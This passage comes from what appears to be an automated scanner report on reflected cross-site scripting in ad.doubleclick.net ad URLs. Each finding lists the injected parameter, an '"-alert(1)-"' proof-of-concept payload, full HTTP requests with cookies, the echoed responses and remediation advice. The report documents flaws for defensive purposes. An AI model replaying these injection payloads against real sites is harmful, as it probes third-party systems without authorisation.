<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&47f95"-alert(1)-"7b5fb722fd8=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D627943%26migTrackFmtExt%3Dclient%3Bio%3Bad%3Bc
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0038"-alert(1)-"d9468d0f92a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259897490;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5e0038"-alert(1)-"d9468d0f92a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6015

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5e0038"-alert(1)-"d9468d0f92ahttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992915&migRandom=614224&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universi
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f05"-alert(1)-"c3c6134ad58 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090d9f05"-alert(1)-"c3c6134ad58&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
IAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090d9f05"-alert(1)-"c3c6134ad58&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var b
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7da0"-alert(1)-"1e6bc067315 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961d7da0"-alert(1)-"1e6bc067315&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961d7da0"-alert(1)-"1e6bc067315&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same a
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66017"-alert(1)-"4b04cff3b6d was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=3866017"-alert(1)-"4b04cff3b6d&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=3866017"-alert(1)-"4b04cff3b6d&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never"
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce398"-alert(1)-"d9ac9bb583e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215ce398"-alert(1)-"d9ac9bb583e&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7280

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
TM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=2076749&pub=281215ce398"-alert(1)-"d9ac9bb583e&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptacc
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21f50"-alert(1)-"dcb5152624c was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=207674921f50"-alert(1)-"dcb5152624c&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7281

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
Y5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-83961&campID=64090&crID=83961&pubICode=207674921f50"-alert(1)-"dcb5152624c&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=http%3a%2f%2fpersonalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcall
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N553.martinimedianet/B4970757.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.martinimedianet/B4970757.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2e6"-alert(1)-"2470cde73b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.martinimedianet/B4970757.3;sz=728x90;click=http://ad.technoratimedia.com/clk?2,13%3Bbc1ea512b36e66d9%3B12e0ab5bca4,0%3B%3B%3B2343140080,XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAo7y1Ci4BAAAAAAAAADY5YjJkMWZjLTM0NTQtMTFlMC04NjBiLTAwMWIyNDc4NGE2MgAzmSoAAAA=,,http%3A%2F%2Fspeckyboy.com%2F,$http://t.invitemedia.com/track_click?auctionID=1297259805974763-839613e2e6"-alert(1)-"2470cde73b&campID=64090&crID=83961&pubICode=2076749&pub=281215&partnerID=38&url=http%3A%2F%2Fspeckyboy%2Ecom%2F&redirectURL=;pc=[TPAS_ID];ord=1297259805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XL5IAKvfDgD0zXgAAAAAABnVHgAAAAAAAgAAAAYAAAAAAP8AAAAECIhvGwAAAAAATbAfAAAAAADfpSgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.WQgAAAAAAAIAAwAAAAAAjdtoAG.BBkBUMCqpE9AKQGQQWDm0SBlAl24Sg8DKHUDOzMzMzMwZQGZmZmZmZh5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADepf-VloGbCY5JXkJ8yQxUfqcfWMMwttvYibDSAAAAAA==,,http%3A%2F%2Fspeckyboy.com%2F,Z%3D728x90%26atf%3D0%26brw%3Dcr3%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26rtg%3Dga%26s%3D974763%26tblg%3Dch%26titn%3Dch%26tphv%3Dch%26ttch%3Dch%26uatRandNo%3D50691%26_salt%3D3626026624%26B%3D10%26u%3Dhttp%253A%252F%252Fspeckyboy.com%252F%26r%3D1,69b2d1fc-3454-11e0-860b-001b24784a62
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:58:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7271

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
